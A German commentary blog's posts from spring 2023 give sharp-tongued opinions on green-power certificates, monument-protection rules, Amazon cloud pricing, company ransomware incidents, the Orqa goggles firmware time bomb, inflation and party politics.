Frau Faeser hat sich in der ganzen Nummer voll verrannt, lag von Anfang an erkennbar falsch und sollte jetzt Konsequenzen tragen.

Wed May 10 2023

[l] Wisst ihr, was sich gerade als Bullshit herausgestellt hat? Ökostrom-Zertifikate aus Island. Island hat ne Menge Ökostrom und betreibt damit u.a. ihre Alu-Hütten. Soweit, so gut.
Aber habt ihr euch mal gefragt, wie die EU es schafft, den Ökostromanteil zu erhöhen, ohne was für Ökostrom zu tun? Nun, sie haben einen Deal mit Island gemacht. Island verkauft Europa "Ökostrom" in Form eines "Zertifikats".
Deutsche Industrie verbrennt nach wie vor Fossilien. Eine Leitung für Ökostrom gibt es nicht aus Island.
Aber unsere Industrie tut dann so, als sei der Strom öko gewesen, weil sie ein Zertifikat von Island gekauft haben. Island hat dann auf dem Papier virtuelle Fossilien verbrannt, und frisst sozusagen unsere Sünden.
Das ist ja schon skandalös genug, aber jetzt kam raus: Island hat sowohl die Zertifikate verkauft als auch ihr Aluminium als Ökostrom-produziert beworben. Damit haben sie natürlich faktisch völlig recht, denn deren Alu ist ja mit Ökostrom produziert. Aber dann kann ja unsere Industrie nicht mehr so tun, als sei hier irgendwas ökologisch.
Daran scheitert der Zertifikats-Bullshit jetzt. DARAN! Nicht etwa daran, dass das die ganze Zeit Verarsche war!
Gut, kann gar nicht früh genug scheitern. Als nächstes scheitert hoffentlich das Greenwashing über Carbon Offsets.
Oder, wisst ihr, alternativ könnten wir auch mal eine Regierung wählen, die einen Plan hat, der nicht auf "wie belügen uns selbst und machen weiter wie immer" hinausläuft. Mal rein hypothetisch gesprochen jetzt.
[l] Lindner hat eine tolle Idee: Warum schenken wir nicht den Banken 2,2 Milliarden Euro?
Zusätzlich zu dem Geld, das sie "schöpfen" dürfen. Und den Zinsen, die sie für Staatsanleihen kassieren. Und für Einlagen bei der Zentralbank.
Aber immerhin haben sie im Gegenzug die ganzen Filialen zugemacht, die lieben Banken!
Die SPD simuliert noch ein bisschen Bauchschmerzen, um dann am Ende umso kraftvoller umzukippen. Lasst euch da mal keinen erzählen von der Süddeutschen.
[l] Kaum verkünde ich das Ende der Denkmalschutz-Debatte, kommen hier Leserbriefe von Denkmalschutz-Mitarbeitern rein. Na gut. Ausnahmsweise:
Ich arbeite selber in der Berliner Verwaltung in einer Denkmalschutzbehörde und bin häufig mit solchen Fällen konfrontiert. Nach dem Berliner Denkmalschutzgesetz sind Werbeanlagen und sowieso alle Maßnahmen an einem in die Liste eingetragenen Baudenkmal, Denkmalbereich oder Gartendenkmal denkmalrechtlich genehmigungspflichtig.
Es gibt zudem einen ganzen Paragraphen über den Umgebungsschutz eines Denkmals. Darin heißt es, dass die unmittelbarer Umgebung eines Denkmals, soweit für Erscheinungsbild von prägender Bedeutung, durch Maßnahmen nicht so verändert werden darf, dass Eigenart oder Erscheinungsbild des Denkmal gestört werden.
Wie weit der Umgebungsschutz reicht, ist je nach Maßnahme und Denkmal unterschiedlich zu bewerten (ein besonders exponiertes Denkmal, wie beispielsweise eine Burg auf einem Hügel, hat einen anderen Umgebungsschutzbereich als ein Mietshaus in der Berliner Innenstadt). Es gibt hier also keine einheitlich anzuwendende Regel, daher sind Entscheidungen im Rahmen des Denkmalschutzgesetzes immer Ermessensentscheidungen. Gleiches gilt für die Erheblichkeit der Störung des Erscheinungsbildes durch Maßnahmen im Umgebungsschutzbereich eines Denkmals. Auch hier wird nach Ermessen entschieden. Ermessensentscheidung im Bereich des Denkmalschutzes verlangen ein hohes Maß an Fachkenntnissen verschiedener Fachrichtungen (Kunstgeschichte, Architektur, Bauingenieurwesen, Restaurierung, Recht usw.), spezifischer Ortskenntnis und immer auch ein Abwägen mehrerer Möglichkeiten.
Grundsätzlich kann man sagen, dass bei einem Neuanstrich eines Nachbargebäudes eines Denkmals oder bei einem Neubau neben einem Denkmal immer zurückhaltende Farben genehmigt werden, die das Denkmal nicht dominieren, aus der Ortstypik rausfallen oder in der Materialität so schlecht sind, dass die Nachbarschaft eines Denkmals nach ein paar Jahren vernachlässigt oder gammlig aussieht. Die Bauwerke und Anlagen in der Umgebung eines Denkmals haben sich grundsätzlich immer an der Qualität des Denkmals zu messen, ohne sich stilistisch anzubiedern aber auch ohne das Denkmal in seiner Wirkung zu stören oder krass hervorzustechen. Bei solchen Fällen werden übrigens auch immer die Stadtplaner der Bezirke mithinzugezogen. Auch die prüfen, ob die Maßnahmen sich in die Eigenart der näheren Umgebung einfügen.
Dem Eigentümer war dem Tagesspiegelartikel zufolge ja bewusst, auf was er sich einlässt und der Deal mit dem Bauamt klingt mehr als freundlich: er muss nur sehen, dass seine Fassade weiterhin ordentlich aussieht. In anderen Berliner Bezirken wäre die Fassade sicherlich längst schon wieder monochrom gestrichen…
Jetzt weißt du vielleicht etwas mehr darüber, warum ausnahmsweise mal nicht irgendein CDU-Fuzzi schuld war.
Solche Fälle nerven mich übrigens in der Praxis sehr, weil sie mich davon abhalten, den wichtigen Teil meines Jobs zu machen: bei der Erhaltung und Sanierung von Denkmalen beratend zur Seite zu stehen und dabei zu helfen, dass auch die nachfolgenden Generationen noch was davon haben und wissen, wie man früher gebaut hat.
Und zum Schluss: Die in Denkmalen wohnenden Menschen in Berlin sind zum Großteil extrem engagiert, was die Erhaltung angeht (was ich so miterlebt habe bisher) und stolz auf ihre alten Gemäuer. Das gilt auch für die Menschen, die in Denkmalbereichen leben, also in Bereichen, in denen so gut wie jedes Gebäude geschützt ist. Gerade in einer Stadt wie Berlin, die sich gerade extrem verändert, kann man froh sein, dass es Planungsrecht und denkmalschutzgesetz gibt und sich für Menschen für ihr gebautes Umfeld einsetzen. Ohne das alles wäre die Stadt innerhalb kürzester (!) Zeit nicht mehr wiederzuerkennen und würde nur noch aus seelenlosen Gebäuden bestehen, da der Erhalt von alten Gebäuden (der übrigens klimaschonender ist als jeder Neubau) immer noch teurer als der Neubau ist. Dann wäre vieles Positives, was Berlin ausmacht, dahin…
Und noch einer:
zu dem Thema muss ich doch mal eine Mail schreiben. Ich sitze auf der "anderen Seite", bei Denkmalbehörden, und das seit über 20 Jahren. Daher bitte ich im Falle einer Veröffentlichung um Anonymisierung.
Zum Thema: Denkmalschutz ist eine gesetzliche Aufgabe der Länder, basierend auf den jeweiligen Denkmalschutzgesetzen. Die Denkmalbehörden sind Exekutivbehörden, die Landesrecht umsetzen. Im Kern geht es darum, Substanz und Erscheinungsbild von Baudenkmalen zu bewahren. Dazu gehört auch, das Gebäude neben einem Denkmal dieses nicht übertönen oder erdrücken, Fachbegriff Umgebungsschutz. Das ist in dem Berliner Fall offenbar ausschlaggebend gewesen. Viele der "Horrorgeschichten" entstehen, wenn sich Leute ein Denkmal kaufen, ohne sich vorher darüber zu informieren, und dann erschrocken feststellen, dass die Behörden da mitreden, bis hin zur Fassadenfarbe, Dachdeckung, Fenster, Türen - praktisch jedes Detail kann bei einem Denkmal relevant sein, auch und gerade das Gebäudeinnere, wie Türen, Fußböden, Decken und Dachkonstruktionen. Das führt zu Konflikten, die sich vielfach vermeiden ließen. Ebenso bei der Umgebung. Die Denkmallisten und -karten sind öffentlich, und man kann bei den Behörden anfragen, ob das irgendwie relevant ist. Wer das unterläßt und deswegen hinterher Ärger kriegt, ist selber schuld. Ist das alles rechtens? Ja. Die Frage, ob der Eingriff in das Recht auf Eigentum verhältnismäßig ist, ist höchstrichterlich längst geklärt. Eigentum verpflichtet, bei einem Denkmal umso mehr. Die A-karte haben Hauseigentümer gezogen, deren Haus neben einem Denkmal liegt. Auch da redet die Behörde mit, wie es aussehen darf, auch wenn das Haus selber kein Denkmal ist. Es geht darum, eine angemessene Umgebung für das Denkmal zu erhalten. Ob es da nun grau oder beige als Fassade sein muss, sei dahingestellt. Die Gerichte urteilen da tendenziell sehr streng. In der Praxis sieht das oft etwas anders aus, das klang ja im Artikel auch an, da war von eine Duldung die Rede (was es formalrechtlich nicht gibt, aber das ist ein anderes Thema). In der Praxis sind Kompromisse fast immer möglich, wenn es darum geht, das Gebäude zu erhalten und zu nutzen. Ohne Nutzung kein Erhalt. Warum das Ganze? Nun, was macht die Identität unserer gebauten Umgebung aus? Da spielen historische Gebäude eine große Rolle. Der Hintergrund sind die Abrißorgien der Nachkriegszeit, denen viel Substanz noch bis in die 80er und später zum Opfer fiel. Das führte in den 1970ern zu einem Umdenken, als die oft vom Krieg schon stark reduzierten historischen Städte noch weiter dem Bagger zum Opfer fielen. Die gebaute historische Umgebung prägt auch unsere Identität mit, sie ist meist unverwechselbar und legt Zeugnis vom Bauen in früherer Zeit ab. Denkmalschutz hat was mit Identität im positiven Sinne zu tun. Das zu erhalten ist die Aufgabe, und die ist angesichts von Nutzungsdruck und wirtschaftlichen Interessen nicht einfach und keineswegs immer erfolgreich. Was das mit "kleinen Menschen, die Macht ausüben wollen" zu tun haben soll, erschließt sich mir nicht, das halte ich für ein Mißverständnis.
Gut, jetzt haben wir gehört, wie die Behörden-Innensicht ist, und sie überrascht mich zumindest nicht. Wir folgen hier nur Befehlen, äh, Gesetzen, und Richter haben das auch bestätigt. Denkmäler gehören geschützt. OK. Ich kann dem sogar inhaltlich weitgehend folgen.
Nur fällt bei mir unter den Begriff "Denkmal" halt sowas wie eine alte Statue. Der Dom. Und ja, der Palast der Republik. Nicht ein olles Mietshaus aus dem letzten Jahrhundert, das nach dem Krieg völlig zerbombt war und wo jemand notdürftig geflickt hat. Und schon gar nicht kann ich nachvollziehen, wieso man dem Nachbarhaus eine farbenfrohe Fassade aufzwängen sollte. Am Ende des Tages ermächtigen sich hier ein paar Bürger, anderen Vorschriften zu machen. Ob ein Haus ein Denkmal sein sollte, ist letztendlich Bauchgefühl von ein paar Leuten, die sich die Befugnis dazu einfach angemaßt haben. Wenn der eine Leserbrief hier schreibt, dass man da Kunsthistoriker dazu zieht, dann beruhigt mich das nicht, eher im Gegenteil. Was soll ein Kunsthistoriker denn bitte sagen? "Das ist Mist, das kann weg"? Nee, natürlich nicht!
Häuser sind zum drin wohnen da. Wenn es Auflagen für Hausbesitzer geben sollte, dann dass da kein Wohnraum leersteht oder für Luxusapartments und Investitionsruinen verschwendet wird, während nebenan unter der S-Bahn-Brücke Obdachlose pennen.
Aus meiner Sicht: Wenn du jemandem vorschreiben willst, welche Farbe die Fassade seines Hauses hat, dann kannst du ihm gerne ein Kaufangebot für das Haus unterbreiten, oder von mir aus die Bemalrechte für die Fassade von ihm mieten.
Eine Denkmalschutzbehörde wird jedenfalls in meinem Weltbild selten bis niemals gegen die Einstufung von etwas als Denkmal votieren, weil ihre Existenz davon abhängt, dass es Denkmäler gibt, und zwar möglichst viele.
Update: Auf der anderen Seite ist das natürlich offensichtlich Werbung, was der Typ da auf die Fassade gemalt hat. Das ".de" hat er weggemacht, als die Behörde meckerte.
Ich persönlich finde das gut, wenn die Stadt gegen Werbung im öffentlichen Raum vorgeht. Dann aber bitte gegen alle Werbung, nicht bloß diese Fassade. Ich erinnere mich noch an eine prägende Fahrt nach Ostberlin, als ich ein kleines Kind war. Da gab es überhaupt keine Neon-Reklame im öffentlichen Raum. Nicht mal die Schaufenster in den Läden waren nachts beleuchtet. Auf mich wirkte das damals sehr bedrohlich, weil es so fremd war. Heute sehe ich das in einem anderen Licht. Die Gesellschaft hat viel zu lange zugelassen, dass der öffentliche Raum von irgendwelchen Marken vergiftet wird.
Update: Den Artikel hab ich versehentlich doppelt gepostet. Eine Kopie ist jetzt weg. Sorry.

Tue May 9 2023

[l] Meine Güte ist meine Inbox jetzt voll mit Denkmalschutz-Horrorgeschichten!
OK, Leute, fassen wir zusammen: Kleine Menschen wollen hier endlich mal Macht über andere ausüben. Beispiele gibt es viele, ich will hier nur mal eines rausgreifen, aus Belgien. Ein Fußballfan hat sein Haus mit den Nationalfarben angemalt. Nicht mal sonderlich aufdringlich, finde ich. Das ging dann durch alle Instanzen und landete am Ende auch noch vor dem Staatsrat.
Eine Anmerkung noch, dann schließe ich das Thema hier. Falls ihr angesichts dieser an Feudalismus erinnernden Horrorzustände überlegt, in die USA auszuwandern, denn die sind ja das Land der Freiheit und unbegrenzten Möglichkeiten, dann solltet ihr vorher Last Week Tonight über Homeowners Associations gucken. Das ist noch schlimmer dort.
[l] OK, jetzt schreibe ich doch noch mal was zu Amazon Prime Video. Hier kam eine Anfrage rein, ob ich nicht einen längeren Artikel dazu schreiben will, aber daraus wurde dann nichts. Die Gedanken habe ich mir jetzt aber schon gemacht. Und nun hat Heise diese Analyse meines hochgeschätzten Kollegens Kris Köhntopp gebracht, die bei mir einen Fall von XKCD 386 auslöst.
Daher hier nochmal meine längeren Gedanken. Der Aufhänger für die ganze Geschichte war ja nicht, dass Amazon von Microservice auf Monolith umgestellt hat, sondern dass sie damit 90% Kosten gespart haben.
Natürlich kann man hier eine tolle Diskussion der Vor- und Nachteile von Modularisierung und Microservices führen. Aber geht halt am Punkt vorbei. Amazon hat das nicht aus strukturellen Gründen umgestellt, sondern weil das 90% billiger ist.
Warum ist das denn 90% billiger? Nun, dazu ein kleines Gedankenexperiment.
Nehmen wir an, ihr geht zu einem Hoster, und mietet bei dem zwei Rechner an. Die stehen am Ende im selben Rechenzentrum, und zwischen ihnen gibt es Ethernet. Der Traffic zwischen den Kisten kostet euch nichts. Denn der kostet auch den Hoster nichts. Das ist ein Kabel, ein Switch. Niemand käme auf die Idee, da einen Trafficzähler dran zu hängen, und euch eine Rechnung pro Kilobyte zu schicken.
Sagte ich niemand? Doch! Die Amazon Cloud macht das so. In der Cloud haben Amazon und co ein Nickel-and-Dime-Abrechnungsmodell etabliert, bei dem man für Dinge Rechnungen kriegt, die beim Hoster mit drin sind, und die dem Cloudanbieter keine Kosten verursachen.
Traffic zwischen den Diensten. Traffic zur Festplatte. Benutzter Platz auf der Festplatte. Sowas.
Was hier also die immensen Einsparungen verursacht hat, das war keinesfalls eine "bessere Architektur". Nein. Das war die gezielte Vermeidung von Amazons Freudenhaus-Preisstruktur. Wenn Amazon für Storage oder den Traffic zum Storage Geld sehen will, dann reduzieren wir am besten temporäre Zwischenspeicher. Wenn Amazon für den Traffic zwischen Microservices Geld sehen will, dann fusionieren wir die am besten zu einem Monolithen zusammen.
DAS ist hier passiert.
Auf architektonischer Ebene kauft man sich mit Verteilung (z.B. auf Microservices) höheren Durchsatz, aber zahlt mit steigender Latenz. Wenn die Latenz wichtig ist, dann versucht man die Pfade kurz zu halten. Wenn der Durchsatz wichtiger ist, dann zerlegt man den Prozess in mehr Stufen und baut ein Fließband-System, bei dem die Schritte entkoppelt sind, damit sie einzeln in die Breite skaliert werden können. Wenn man das geschickt macht, kann man sowohl hohen Durchsatz und geringe Latenz haben. Das ist dann aber mit Arbeit verbunden.
Die Story hier ist also meiner Ansicht nach nicht über Microservices oder Monolithen oder Modulithen, wie Kris sie nennt, sondern über Amazons Preisstruktur. Wieso das außerhalb von Amazon anscheinend niemandem auffällt, sondern wir dafür einen Blogpost von deren Videoabteilung brauchen.
Wo sind denn eigentlich die ganzen schonungslosen Analysen, ob die Dinge durch die Cloud-Migration tatsächlich billiger oder effizienter geworden sind?! Ich sehe keine davon. Weil keiner zugeben will, dass das dadurch langsamer, unzuverlässiger und teurer geworden ist, ohne irgendeinen Vorteil zu zeitigen.
Update: Ein Leser empfahl zu Amazons Kostenstruktur diese handliche Übersicht. Na dann ist ja jetzt alles klar. *gacker*
[l] Zu der bunten Fassade kam ein beunruhigender Leserbrief aus der Schweiz rein:
Naja, für Schweizer ist das eher harmlos. Hier musste unlängst ein Hausbesitzer sein Haus neu anmalen lassen, weil der gewählte Weisston der Fassade einen leichten Blaustich hatte. Das Haus war nicht denkmalgeschützt oder sowas. Begründung der Gemeinde: die Farbe wäre im Vergleich zu den Nachbarhäusern zu "kalt". Vor ein paar Jahren musste hier in der Nähe ein Hausdach neu gedeckt werden. In der Schweiz brauchst du (je nach Gemeinde) eine Baugenehmigung für die Ziegel (oder was auch immer) auf deinem Hausdach.
Der gute Mann hatte eine solche und durfte sein Hausdach golden decken. Als das Dach fertig war, kam die Gemeinde, das Dach sei zu auffällig und würde Autofahrer ablenken und er musste es neu in neutraler Farbe decken. Ich habe in meinem Haus vor ein paar Jahren zwei Fenster erneuert. Die alten Fenster waren weiss, die neuen Fenster sind weiss. Hatte ich als Auflage in der Baugenehmigung und als die Fenster ausgetauscht waren, kam ein Gemeindebüttel vorbei und hat Fotos von den neuen Fenstern gemacht, damit die Gemeinde prüfen konnte, ob die Fenster auch wirklich weiss sind. Bei einer Fassade wie der von dem Hotel würde hier vermutlich direkt ein abbruchtrupp der Gemeinde anrücken.
Ich habe keinerlei Verständnis für sowas.
Aus meiner Sicht sind das kleine unwichtige Menschen, die endlich auch mal Gewalt über andere haben und das dann ausnutzen, um ihre eigene Unwichtigkeit für eine Sekunde vergessen zu können. Abstoßendes Verhalten!
Update: Das hier scheint der Fall zu sein.

Wed May 3 2023

[l] Ein Leser erzählt folgende krasse Geschichte:
Vor ca. 3 Tagen haben alle Videobrillen des kroatischen Herstellers Orqa zeitgleich den Betrieb komplett eingestellt und keiner wusste bisher, warum das so ist und wie man das behebt.
Diese Videobrillen werden als Videoempfänger und Bildausgabegerät für (Hobby-) Drohnen und Flugmodelle genutzt, um die Flugmodelle aus der Pilotenperspektive zu steuern.
Für die Besitzer dieser (recht teuren, ca 600€) Geräte hieß das, dass diese an einem Sonntagnachmittag - zur besten Hobbyzeit - plötzlich gar nicht mehr fliegen konnten. Quasi die Apokalypse für den Hersteller der Videobrillen, da dieser ausschließlich von diesem einem Produkt lebt.
Der Hersteller sprach erst von einem Softwarebug, der mit Zeit/Datum zusammenhängen sollte.
Mittlerweile hat sich aber herausgestellt, dass ein ehemaliger contractor von Orqa vor einigen Jahren schon eine Firmware-"Zeitbombe" in den Bootloader eingebaut hatte, die gezielt an diesem Sonntag die Hardware weltweit funktionsunfähig gemacht hat, um Lösegeld von Orqa zu erpressen - ganz unter dem Vorwand von "Lizenzkosten".
Offensichtlich wurde hier Entwicklung outgesourced und nicht weiter überprüft.
Der Vorfall wurde mittlerweile von Orqa auf deren Webseite exakt so bestätigt.
Das Problem wurde bisher noch nicht behoben und die Hardware ist nach wie vor für alle Kunden funktionsunfähig.
Das dürfte außerdem meines Wissens nach einer der ersten dokumentierten Fälle von Ransomware auf Consumerhardware sein.
(Unabhängig von dieser Story werden diese Videobrillen - wie viele änhliche Modelle anderer Hersteller - auch aktuell im Ukrainekrieg eingesetzt, um dort mit Sprengladungen bestückte Drohnen zu fliegen. Die Piloten dort werden von dem gleichen Problem betroffen sein, der Ransomwareangriff hat damit aber keinen direkten Zusammenhang)

Tue May 2 2023

[l] Ein Fotograf hat versucht, seine Bilder aus den Trainingsdaten von LAION entfernen zu lassen. Ergebnis: "Nein". Und eine Anwaltsrechnung über knapp 900 Euro.
Begründung: Wir haben deine Bilder nicht mehr, die sind in die trainierte KI eingeflossen und können jetzt nicht mehr entfernt werden. Durch deinen Copyright-Antrag sind uns Kosten entstanden, die muss jetzt jemand tragen. Wir haben ja nichts falsches gemacht, also: Du.
Laion sind die hier. Ein gemeinnütziger Verein aus Hamburg. Die Kanzlei mit der Rechnung war Heidrich Rechtsanwälte, as in Jörg Heidrich, Heise-Justiziar. Der Fotograf heißt Robert Kneschke. Seine Darstellung des Sachverhalts findet ihr in seinem Blog.
Aktuelle Eskalationsstufe:
Update 27.04.2023, 16:25 Uhr:
Wir haben eben die Klage gegen LAION e.V. vor dem Landgericht Hamburg eingereicht.
Na da bin ich mal gespannt, was aus der Geschichte wird.
Update: Mir haben mehrere Leser geschrieben, dass das sogar noch ein bisschen absurder ist. LAION hat gar kein KI-Modell von den Fotos sondern bloß eine Liste mit URLs zu den Bildern. Das rückt das Auskunftsersuchen des Fotografen für mich in ein anderes Licht. (Danke, Sebastian)
[l] Gute Nachrichten! Immer noch über 7% Inflation!!1!
Was daran positiv sein soll? Nun, äh, vielleicht das hier?
Für Entspannung sorgte die Entwicklung der Nahrungsmittelpreise: Diese kletterten nur noch um 17,2 Prozent, nachdem sie im März noch um 22,3 Prozent gestiegen waren.
Oh nee, warte, das ist ja auch apokalyptisch schlecht. Wie wäre es hiermit?
Energie verteuerte sich mit 6,8 Prozent unterdurchschnittlich, nach einem Zuwachs von 3,5 im März und plus 19,1 Prozent im Februar.
Wohlgemerkt: Die reden hier immer in der Ableitung. Die zahlen Steigen. Die vergleichen hier die 2. Ableitung, die Veränderung der Steigerungsrate.
Seht ihr? Alles super! So hohe Werte haben wir noch nie gemacht! Wir sind wieder wer!!
Update: Nota Bene: Die Zahlen sind so hoch, obwohl sie gerade die Berechnungsmethode geändert haben, damit die Zahlen nicht so krass aussehen.
Update: Jetzt schreiben mir lauter Spaßbremsen, dass das technisch gesehen nur die 1. Ableitung ist. Dazu kann ich nur sagen: Jaja. Ist ja gut. Setzt euch wieder. :-) (Danke, Andreas)

Thu Apr 27 2023

[l] Seit in paar Tagen gehen hier Gerüchte ein, dass mehrere Krankenkassen operative Herausforderungen haben, die nach Ransomware aussehen, aber leider nie irgendwas verlinkbares.
Dann verdichteten sich die Hinweise, dass das bei deren gemeinsamem IT-Dienstleister Bitmarck gewesen sein wird.
Und jetzt gibt Bitmarck das auf ihrer Homepage zu.
Die kriminelle Energie, die hier bei den hochkriminellen Kriminellen vorlag, war überwältigend kriminell. Bitmarck hat schnell die Behörden informiert und externe Dienstleister eingeschaltet und wirft sicherheitshalber ein paar Nebelkerzen:
Sind Kunden- oder Versicherten-Daten abgeflossen?
Nein, nach jetzigem Stand der umfassenden Analysen, die wir umgehend eingeleitet haben, sind keine Daten von Kunden oder Versicherten betroffen.
Das ist selbstredend eine absolute Nullaussage. Wenn man Bitmarck nicht vertrauen kann, dass sie die Daten sichern können, kann man auch ihren Erkenntnissen zu Datenabflüssen nicht trauen.
Update: Wie schlimm ist die Lage? Die Kontakt-E-Mail auf der Bitmarck-Homepage geht zu kekstcnc.com. Das ist eine PR-Agentur. Was tun die so? Nun, ... seht selbst.
we help our clients maintain control of the narrative in the event of a cyberattack, minimizing reputational damage and preserving the trust of stakeholders
Zu spät, würde ich sagen.
Update: Immerhin sind das Profis. Die haben als erstes die Liste der betroffenen Krankenkassen weggemacht. Da weißte, wasde hast.

Sat Apr 22 2023

[l] Hey, wisst ihr, was in diesem Lande das eigentliche Problem ist? Nicht? Nun, das hat die FDP gerade auf ihrem Parteitag enthüllt.
Lindner auf FDP-Parteitag: "Für ein nicht-linkes Deutschland"
Ja, meine Damen und Herren. Richtig gelesen! Die fiesen Linken haben dieses Land in den Abgrund gewirtschaftet! Ihr wisst schon, so Leute wie Helmut Kohl, Gerhard Schröder, Angela Merkel und Olaf Scholz.
Endlich spricht das mal jemand an!1!!
Gut, das muss man vielleicht auch dazu sagen. An Helmut Kohl erinnert sich kaum noch jemand. Gazprom-Gerd hält man vielleicht auf den ersten Blick nicht für eine linke Socke, nachdem er den Sozialstaat demoliert hat. Bei Angela Merkel lässt sich vielleicht der eine oder andere von ihrer Partei von ihrer linken Gesinnung ablenken. Wenn man Leute fragt, ob Merkel linke Politik gemacht hat, dann fragen die: Merkel hat Politik gemacht?!
Und Olaf Scholz? Der Cum-Ex-Kanzler? Der Anti-Robin-Hood? Nimmt von den Armen und gibt es den Reichen? Gut, das kann man verzeihen, wenn den Leuten nicht auf Anhieb klar ist, was für grund-linke Politik der so gemacht hat.
*facepalm*

Mon Apr 17 2023

[l] Wie schlimm ist die Lage? So schlimm: 75k Menschen unterzeichnen eine Petition, die bloß fordert, was eh schon im aktuellen Entwurf des Umweltministeriums steht.
SO restlos und nachhaltig zerstört ist das Vertrauen in die Politik in diesem Lande.
Der Einsender erläutert:
das Referat [hat] die Petition zensiert hatte mit dem Argument, dass eine “ähnliche” Petition bei der es um die Umwidmung von Rasenfläche zu Willblumenwiesen ging mit 82 Unterschriften gescheitert sei. Es brauchte dann erst diverse Anläufe und mehrere Bundestagsabgeordnete, damit sie die dann doch veröffentlich haben und es musste der Referatsleiterin erklärt werden, dass es sich um ein Grundrecht handelt, dass sie das unverändert annimmt.
Der Einreicher hat ein Youtube-Video dazu gemacht.
Mir ist ja auch völlig unklar, wieso man da überhaupt irgendwas anmelden muss. Ich kann einen Kühlschrank einfach reinstecken. Wieso nicht eine Balkonsolaranlage?

Fri Apr 7 2023

[l] Schade, dass der Berliner Senat ausgerechnet Franziska "Clankriminalität" Giffey zur Bausenatorin gemacht hat, die ja bereits angesagt hat, dass sie auf den Willen der Bevölkerung in Sachen Verstaatlichung der Wohnungsbaugesellschaften zu scheißen gedenkt.
Im Moment wäre die Gelegenheit günstig gewesen.

Thu Apr 6 2023

[l] Die Tagesschau liefert mal wieder :-(
Exklusiv Hackerangriffe
Cybermafia von Putins Gnaden?
Da ärgere ich mich ja direkt über das "EXKLUSIV". Wenn ein Fragezeichen im Titel ist, ist es nicht exklusiv. Dann ist es nicht mal Fakten-Berichterstattung sondern Mutmaßung. "Cybermafia" und "von Putins Gnaden" sind natürlich stark vorbelastete und lenkende Begriffe, die Berichterstattung eh ausschließen. Das ist Meinungsmache.
Kann gerechtfertigte Meinungsmache sein, aber es ist jedenfalls Meinungsmache.
Gucken wir mal weiter.
Europaweit werden Webseiten lahmgelegt - womöglich von prorussischen Hackern. Experten warnen vor der Entstehung einer Mischszene aus Cyberkriminellen, Hacktivisten und russischen Geheimdiensten.
"womöglich" ist ein Wieselwort und heißt: Wir wissen es nicht, Beweise haben wir natürlich auch keine, nicht mal ordentliche Indizien. "Experten warnen" ist auch eine große rote Warmlampe, dass hier Bullshit kommt.
Womöglich ist nicht mal ein gutes Wieselwort. Ich nehm immer "offenbar". Das sagt, dass das eine Deutung von mir ist, und damit eine Meinung und keine Tatsachenbehauptung. Ist euch hoffentlich schon aufgefallen, dass ich das Wort gerne und häufig verwende, und dass ich hier verdammt selten verklagt oder abgemahnt werde.
Plötzlich ging nichts mehr. Webseiten und Internetportale bundesweit waren in dieser Woche nicht mehr erreichbar, darunter die Onlineauftritte von Landesministerien und Polizeibehörden.
Da krieg ich direkt Stresspickel. It was a dark and stormy night. Das ist so "Onkel erzählt Kleinkind eine Geschichte"-Niveau. "Plötzlich ging nichts mehr". *göbel*
Wieso publizieren die sowas? Wollen die, dass ihre Leser mitkriegen, wie wenig ernst genommen sie werden?
Außerdem: Wenn Webseiten von Ministerien und Polizeibehörden ausgefallen sind, ist die Story erst recht nicht "exklusiv". Wenn ich das aus meinem Wohnzimmer sehen kann, ist das nicht exklusiv.
Sie brachen unter der Last von massenhaften Zugriffen auf die Server schlichtweg zusammen.
Das nennt sich DDOS und ist kein Hackerangriff. Eher eine Sitzblockade.
Und so geht das weiter. Murmeln, Andeutungen und Hörensagen, garniert mit lenkender Wortwahl und Meinungsmache.
Ich finde das sehr enttäuschend, dass das Niveau derartig schlecht ist bei der ARD. Der Autor von diesem Artikel fällt schon länger negativ auf, durch Wiedergabe von Geheimdienst-Einflüsterungen statt Journalismus.

Wed Mar 29 2023

[l] Also SO einen klaren Fall von Windows, Office und Active Directory hatten wir ja schon lange nicht mehr!
Die IT-Beratung Materna SE aus Dortmund ist am Samstag dem 25.03.2023 Ziel eines professionell ausgearbeiteten Cyber-Angriffs auf Netzwerkebene geworden. Dabei wurden Systeme im Unternehmensnetzwerk attackiert sowie kompromittiert.
Lass mich das mal kurz verständlicher formulieren: Wir haben verkackt und wurden gehackt.
Zum gegenwärtigen Zeitpunkt sind die Systeme und Dienste aus Sicherheitsgründen vorübergehend in der Verfügbarkeit eingeschränkt.
Nee. Nicht aus Sicherheitsgründen. Aus Unsicherheitsgründen. Weil ihr eure Security verkackt hattet.
Unmittelbar nach dem Sicherheitsvorfall wurden die zuständigen Ermittlungsbehörden (Zentralstelle Cyber-Crime) hinzugezogen.
Na DANN ist ja alles gut jetzt!1!!
Parallel sind externe unabhängige Sicherheitsdienstleister für die forensische Untersuchung sowie die Absicherung und Wiederherstellung im Einsatz.
Wieso habt ihr das Geld nicht vor dem Vorfall in die Hand genommen sondern verbrennt es jetzt, wo es nicht mehr hilft?
Zusätzlich wurde eine Erstmeldung bei der Datenschutzbehörde erfolgreich abgesetzt, um präventiv bei einer möglichen Datenkompromittierung agieren zu können.
Nee, nicht um präventiv agieren zu können, sondern weil das DAS GESETZ IST.
Die Materna SE aus Dortmund hat Sofortmaßnahmen sowie reguläre Maßnahmen zum Schutz der Kundendaten sowie internen Daten veranlasst, um die Situation zu überwachen sowie im gesicherten Umfeld zu kontrollieren.
Ah ja? Und welche Maßnahmen waren das bitteschön? Wie wollt ihr denn irgendwas kontrollieren können, jetzt wo die Angreifer im System waren und potentiell alles bereits rausgetragen haben?
Das Materna-Team ist optimistisch, den Angriff der Akteure auf das Unternehmen abzuwehren
Abwehren? Den Angriff, der bereits erfolgreich erfolgt ist? Den abzuwehren seid ihr optimistisch? Vielleicht solltet ihr mal professionelle Hilfe in Anspruch nehmen, und ich rede hier nicht von IT-Hilfe.
Update: Was macht Materna eigentlich beruflich? Nun, sie verkaufen den Leuten "Security". Ist euch mal aufgefallen, dass alle in Detektion und Post-Incident-Bürokratie investieren, aber keiner in Abwehr? Der Grund liegt auf der Hand. Wenn man in Abwehr investieren würde, müsste man Prozesse umstellen, und dann wäre sichtbar, was man vorher alles falsch gemacht hat. Wenn man so tut, als seien Cyberangriffe halt Schicksal und Detektion und Handling reicht, dann ist niemand schuld und alle werden früher oder später gehackt, wodurch dann erst recht niemand schuld ist.

Sun Mar 26 2023

[l] Die Contentmafia siegt vor Gericht gegen das Internet Archive. Die Vorgeschichte ist, dass das Internet Archive Bücher gekauft hat, dann gescannt, und dann Leuten digital zugänglich gemacht hat. Allerdings nur soviele Ausleihen zugelassen hat, wie sie auch physische Kopien des Buches hatten.
